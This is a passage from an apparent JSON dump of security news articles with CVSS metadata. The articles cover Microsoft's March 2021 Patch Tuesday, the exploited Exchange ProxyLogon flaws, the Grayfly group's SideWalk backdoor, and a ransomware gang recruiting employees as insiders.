Microsoft also included five previously disclosed vulnerabilities, which are being actively exploited in the wild.\n\nFour of the actively exploited flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065), found [in Microsoft Exchange](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>), were disclosed as part of an emergency patch earlier this month by Microsoft; [businesses have been scrambling to patch their systems](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as the bugs continue to be exploited in targeted attacks. The fifth actively-exploited flaw exists in the Internet Explorer and Microsoft Edge browsers ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)). Proof-of-concept (PoC) exploit code also exists for this flaw, according to Microsoft.\n\n\u201cFor all of March, Microsoft released patches for 89 unique CVEs covering Microsoft Windows components, Azure and Azure DevOps, Azure Sphere, Internet Explorer and Edge (EdgeHTML), Exchange Server, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V,\u201d said Dustin Childs with Trend Micro\u2019s Zero Day Initiative, [on Tuesday](<https://www.zerodayinitiative.com/blog/2021/3/9/the-march-2021-security-update-review>).\n\n## **Internet Explorer\u2019s Actively Exploited Flaw**\n\nThe memory-corruption flaw ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)) in Internet Explorer and Microsoft Edge could enable remote code execution. Researchers said the flaw could allow an attacker to run code on affected systems, if victims view a specially crafted HTML file.\n\n\u201cWhile not as impactful as the Exchange bugs, enterprises that rely on Microsoft browsers should definitely roll this out quickly,\u201d said Childs. 
\u201cSuccessful exploitation would yield code execution at the level of the logged-on user, which is another reminder not to browse web pages using an account with administrative privileges.\u201d\n\nPoC exploit code is also publicly available for the issue. The bug is \u201ctied to a vulnerability\u201d that was [publicly disclosed in early February](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) by ENKI researchers. The researchers claimed it was one of the vulnerabilities used in a [concerted campaign by nation-state actors to target security researchers](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>), and they said they would publish PoC exploit code for the flaw after the bug has been patched.\n\n\u201cAs we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits,\u201d according to Satnam Narang, staff research engineer at Tenable. \u201cWe strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.\u201d\n\n## **PoC Exploit Code Available For Windows Privilege Elevation Flaw**\n\nIn addition to the five actively exploited vulnerabilities, Microsoft issued a patch for a vulnerability in Win32K for which public PoC exploit code is also available. This flaw [ranks important in severity](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27077>), and exists in Windows Win32K ([CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>)). A local attacker can exploit the flaw to gain elevated privileges, according to Microsoft. 
While PoC exploit code is available for the flaw, the tech giant said it has not been exploited in the wild, and that exploitation is \u201cless likely.\u201d\n\n## **Other Microsoft Critical Flaws**\n\nMicrosoft patched 14 critical vulnerabilities overall in this month\u2019s Patch Tuesday updates, including [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>), which exists in Windows DNS server and can enable remote code execution. The flaw is one out of seven vulnerabilities in Windows DNS server; the other six are rated important severity. The critical-severity flaw can be exploited by an attacker with an existing foothold on the same network as the vulnerable device; the attack complexity for such an attack is \u201clow.\u201d\n\nA critical remote code-execution flaw also exists in Microsoft\u2019s Windows Hyper-V hardware virtualization product ([CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>)), which could allow an authenticated attacker to execute code on the underlying Hyper-V server.\n\n\u201cWhile listed as a CVSS of 9.9, the vulnerability is really only relevant to those using the Plan-9 file system,\u201d said Childs. \u201cMicrosoft does not list other Hyper-V clients as impacted by this bug, but if you are using Plan-9, definitely roll this patch out as soon as possible.\u201d\n\nAnother bug of note is a remote code-execution flaw existing on Microsoft\u2019s SharePoint Server ([CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>)). The flaw can be exploited by a remote attacker on the same network as the victim, and has a low attack complexity that makes exploitation more likely, according to Microsoft.\n\n\u201cFor an attack to succeed, the attacker must be able to create or modify sites with the SharePoint server,\u201d according to Childs. 
\u201cHowever, the default configuration of SharePoint allows authenticated users to create sites. When they do, the user will be the owner of this site and will have all the necessary permissions.\u201d\n\n## **Microsoft Exchange Updates: Patch Now**\n\nThe Microsoft Patch Tuesday updates come as businesses grapple with existing Microsoft Exchange zero-day vulnerabilities that were previously disclosed and continue to be used in active exploits. Overall, Microsoft had released out-of-band fixes for seven vulnerabilities \u2013 four of which were the actively-exploited flaws.\n\nOn Monday, the [European Banking Authority disclosed a cyberattack](<https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-2>) that it said stemmed from an exploit of the Microsoft Exchange flaw. Beyond the European Banking Authority, one recent report said [that at least 30,000 organizations](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) across the U.S. have been hacked by attackers exploiting the vulnerability.\n\n\u201cIf you run Exchange on-premise, you need to follow the published guidance and apply the patches as soon as possible,\u201d said Childs. \u201cMicrosoft has even taken the extraordinary step of creating patches for out-of-support versions of Exchange. 
Ignore these updates at your own peril.\u201d\n\nAlso released on Tuesday were Adobe\u2019s security updates, [addressing a cache of critical flaws](<https://threatpost.com/adobe-critical-flaws-windows/164611/>), which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.\n", "cvss3": {}, "published": "2021-03-09T22:12:56", "type": "threatpost", "title": "Microsoft Patch Tuesday Updates Fix 14 Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27077"], "modified": "2021-03-09T22:12:56", "id": "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "href": "https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-09T14:38:24", "description": "The novel backdoor technique called [SideWalk](<https://threatpost.com/sparklinggoblin-apt/168928/>), seen in campaigns targeting US media and retailers late last month, has been tied to an adversary that\u2019s been around for quite a while: namely, China-linked Grayfly espionage group.\n\nESET researchers, who named and discovered the new \u201cSparklingGoblin\u201d advanced persistent threat (APT) actor behind SideWalk, 
[reported](<https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/>) at the time that the group is an offshoot of another APT \u2013 Winnti Group \u2013 first identified in 2013 by Kaspersky.\n\nESET also said that the SideWalk backdoor is similar to one used by [Winnti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>) (aka APT41, Barium, Wicked Panda or Wicked Spider, an APT [known for](<https://threatpost.com/apt41-operatives-indicted-hacking/159324/>) nation state-backed cyberespionage and financial cybercrime) called CrossWalk (Backdoor.Motnug). Both CrossWalk and SideWalk are modular backdoors used to exfiltrate system information and can run shellcode sent by the command-and-control (C2) server.\n\nAccording to a [report](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware>) published by Symantec on Thursday, the SideWalk malware has been deployed in recent Grayfly campaigns against organizations in Taiwan, Vietnam, the US and Mexico. Symantec\u2019s Threat Hunter Team has observed recent campaigns that have involved exploits targeting Exchange and MySQL servers.\n\nBesides attacking organizations in the IT, media and finance sectors, the group also has zeroed in on the telecoms sector, according to the report.\n\n## Indicted but Undeterred\n\nThe US [indicted](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) several members of APT41 in September 2020, all of them Chinese residents and nationals. 
A federal grand jury charged them with pulling off dozens of crimes, including allegedly facilitating \u201cthe theft of source code, software code-signing certificates, customer-account data and valuable business information,\u201d which in turn \u201cfacilitated other criminal schemes, including ransomware and cryptojacking.\u201d\n\nAs the Department of Justice (DOJ) said at the time, one of the defendants \u2013 Jiang Lizhi \u2013 allegedly bragged about having a \u201cworking relationship\u201d with the Chinese Ministry of State Security: a relationship that would give him and his alleged co-conspirators a degree of state protection.\n\nAccording to Symantec researchers, the SideWalk campaign suggests that the [arrests and the publicity](<https://threatpost.com/apt41-operatives-indicted-hacking/159324/>) can\u2019t have made much of a dent in the group\u2019s activity.\n\n## **Pesky Grayfly**\n\nYou might know Grayfly better by its aliases, which include GREF and Wicked Panda. Symantec said that even though the Grayfly APT is sometimes labeled APT41, its researchers consider Grayfly to be a distinct arm of APT41 that\u2019s devoted to espionage. This is similar to how Symantec separately tracks other sub-groups of APT41, such as Blackfly, the APT\u2019s cybercrime arm.\n\nGrayfly, a targeted attack group, has been around since at least March 2017, using the CrossWalk/Backdoor.Motnug (aka TOMMYGUN) backdoor. The group has also wielded a custom loader called Trojan.Chattak, Cobalt Strike (aka Trojan.Agentemis, the legitimate, commercially available tool used by network penetration testers and, increasingly, [by crooks](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>)) and ancillary tools in its attacks.\n\nResearchers have seen Grayfly targeting a number of countries in Asia, Europe, and North America across a variety of industries, including food, financial, healthcare, hospitality, manufacturing and telecommunications. 
Recently, it\u2019s continued to torment telecoms, but it\u2019s also been going after the media, finance and IT service providers.\n\nGrayfly\u2019s typical modus operandi is to target publicly facing web servers to install web shells for initial intrusion before spreading further within the network, Symantec said. After it has penetrated a network, Grayfly then might install its custom backdoors onto more systems. That gives the operators remote access to the network and proxy connections that enable them to access hard-to-reach segments of a target\u2019s network, according to the writeup.\n\n## **Walking the Slippery SideWalk **\n\nSymantec researchers observed that in the recent SideWalk campaign, Grayfly looked to be particularly interested in attacking exposed Microsoft Exchange or MySQL servers, suggesting that \u201cthe initial vector may be the exploit of multiple vulnerabilities against public-facing servers.\u201d\n\nIn fact, the Cybersecurity & Infrastructure Security Agency (CISA) recently put out an urgent [alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) about a [surge in ProxyShell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as attackers launched 140 web shells against 1,900 unpatched Microsoft Exchange servers. Security researchers at Huntress reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 
6. A few weeks later, the surge hit.\n\nIn at least one of the SideWalk attacks that Symantec researchers observed, the suspicious Exchange activity was followed by PowerShell commands used to install an unidentified web shell. That may sound familiar, given that one of the vulnerabilities Huntress described last month was CVE-2021-34523: a bug that enables malicious actors to execute arbitrary code post-authentication on Microsoft Exchange servers due to a flaw in the PowerShell service not properly validating access tokens.\n\nThe Grayfly attackers executed the malicious SideWalk backdoor after the web shell was installed. Then, they deployed a tailor-made version of the open-source, credential-dumping tool Mimikatz that Symantec said has been used in earlier Grayfly attacks. Symantec\u2019s report does a deep dive on the technical details, including indicators of compromise.\n\nExpect more to come, researchers said, since this fly isn\u2019t likely to buzz off: \u201cGrayfly is a capable actor, likely to continue to pose a risk to organizations in Asia and Europe across a variety of industries, including telecommunications, finance, and media. It\u2019s likely this group will continue to develop and improve its custom tools to enhance evasion tactics along with using commodity tools such as publicly available exploits and web shells to assist in their attacks.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T14:30:56", "type": "threatpost", "title": "SideWalk Backdoor Linked to China-Linked Spy Group \u2018Grayfly\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34523"], "modified": "2021-09-09T14:30:56", "id": "THREATPOST:1CEC18436389CF557E4D0F83AE022A53", "href": "https://threatpost.com/sidewalk-backdoor-china-espionage-grayfly/169310/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-20T15:40:05", "description": "Researchers have discovered a Nigerian threat actor trying to turn an organization\u2019s employees into insider threats by soliciting them to deploy ransomware for a cut of the ransom profits.\n\nResearchers at Abnormal 
Security identified and blocked a number of emails sent earlier this month to some of its customers that offered people $1 million in bitcoin to install DemonWare ransomware. The would-be attackers said they have ties to the DemonWare ransomware group, also known as Black Kingdom or DEMON.\n\n\u201cIn this latest campaign, the sender tells the employee that if they\u2019re able to deploy ransomware on a company computer or Windows server, then they would be paid $1 million in bitcoin, or 40% of the presumed $2.5 million ransom,\u201d researchers wrote in a [report published Thursday](<https://abnormalsecurity.com/blog/nigerian-ransomware-soliciting-employees-demonware/>) about the campaign. \u201cThe employee is told they can launch the ransomware physically or remotely.\u201d\n\nDemonWare, a Nigeria-based ransomware group, has been around for a few years. The group was last seen alongside numerous other threat actors launching [a barrage of attacks](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) [targeting](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) Microsoft Exchange\u2019s [ProxyLogon](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) set of vulnerabilities, [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), which were discovered in March.\n\n## **Accomplice-Based Campaign**\n\nThe campaign begins with an initial email soliciting help from an employee to install ransomware while dangling the offer of payment if the person follows through. It also gives the recipient\u2014who attackers later said they found via LinkedIn\u2014a way to contact the sender of the email.\n\nResearchers from Abnormal Security did just that to find out more about the threat actor and the campaign. 
They sent a message back indicating that they had viewed the email and asked what they needed to do to help, they reported.\n\n\u201cA half hour later, the actor responded and reiterated what was included in the initial email, followed by a question about whether we\u2019d be able to access our fake company\u2019s Windows server,\u201d researchers wrote. \u201cOf course, our fictitious persona would have access to the server, so we responded that we could and asked how the actor would send the ransomware to us.\u201d\n\nResearchers continued to communicate over five days with the threat actors as if they were willing to be a part of the scam. \u201cBecause we were able to engage with him, we were better able to understand his motivations and tactics,\u201d they wrote in the report.\n\n## **Changing the Game**\n\nUpon being contacted, the threat actor sent researchers two links for an executable file that could be downloaded from the file-sharing sites WeTransfer or Mega.nz.\n\n\u201cThe file was named \u2018Walletconnect (1).exe\u2019 and based on an analysis of the file, we were able to confirm that it was, in fact, ransomware,\u201d researchers noted.\n\nThe threat actor showed flexibility in how much ransom he was willing to receive from the company, researchers said. While the original amount was $2.5 million in bitcoin, the threat actor quickly lowered that sum to $250,000 and then to $120,000 when researchers said that the fake company for which they worked had an annual revenue of $50 million.\n\n\u201cThroughout the conversation, the actor repeatedly tried to alleviate any hesitations we may have had by ensuring us that we wouldn\u2019t get caught, since the ransomware would encrypt everything on the system,\u201d researchers said. 
\u201cAccording to the actor, this would include any CCTV (closed-circuit television) files that may be stored on the server.\u201d\n\nBased on research done before they opened the line of communication, the researchers said that the actor with whom they communicated was likely Nigerian, \u201cbased on information found on a Naira (Nigerian currency) trading website and a Russian social media platform website.\u201d\n\n## **Social Engineering as Cybercrime Strategy**\n\nOverall, the experiment provided new insight and context regarding how West African threat actors\u2014who are primarily located in Nigeria\u2014\u201chave perfected the use of social engineering in cybercrime activity,\u201d researchers said.\n\nIndeed, there long has been \u201ca blurry line\u201d between cybercrime and social engineering, observed one security professional. \u201cThis is an example of how the two are intertwined,\u201d said Tim Erlin, vice president of strategy at [Tripwire](<http://www.tripwire.com/>), of the campaign.\n\n\u201cAs people become better at recognizing and avoiding phishing, it should be no surprise to see attackers adopt new tactics to accomplish their goals,\u201d he said in an email to Threatpost.\n\nThe campaign also sheds light on how attackers leverage the idea of a disgruntled insider to try to get them to do their dirty work for them\u2014a concept that also isn\u2019t new, but can provide key insight into yet another way ransomware can find its way onto an organization\u2019s network, noted another security professional.\n\n\u201cIt is always important that ransomware victims try their best to track down how the ransomware got into their environment,\u201d said Roger Grimes, data-driven-defense analyst at [KnowBe4](<http://www.knowbe4.com/>). \u201cIt is an important step. 
If you do not figure out how hackers, malware and ransomware are getting in, you are not going to stop them or their repeated attempts.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T14:09:50", "type": "threatpost", "title": "Nigerian Threat Actors Solicit Employees to Deploy Ransomware for Cut of Profits", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065"], "modified": "2021-08-20T14:09:50", "id": "THREATPOST:34CC110D7F26B1B4D3B97BE05F000B69", "href": "https://threatpost.com/nigerian-solicits-employees-ransomware-profits/168849/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens 
of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. \u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. 
But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. 
After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. 
Organizations whose servers were breached and backdoored with a web shell and other post-exploitation tools remain at risk of future compromise until those artifacts are completely rooted out of their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding that it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some of its customers' compromised Exchange servers had been deployed with crypto-mining software called 
[DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), malware documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. They can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" said Mat Gangwer, senior director of managed threat response at Sophos. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-AxSsNt-9gYo/YD838gSOOTI/AAAAAAAAB7Q/IuSgG26w0NU-eyKMabZMnUfb7QBDyHkUgCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nMicrosoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously 
undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. 
The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" 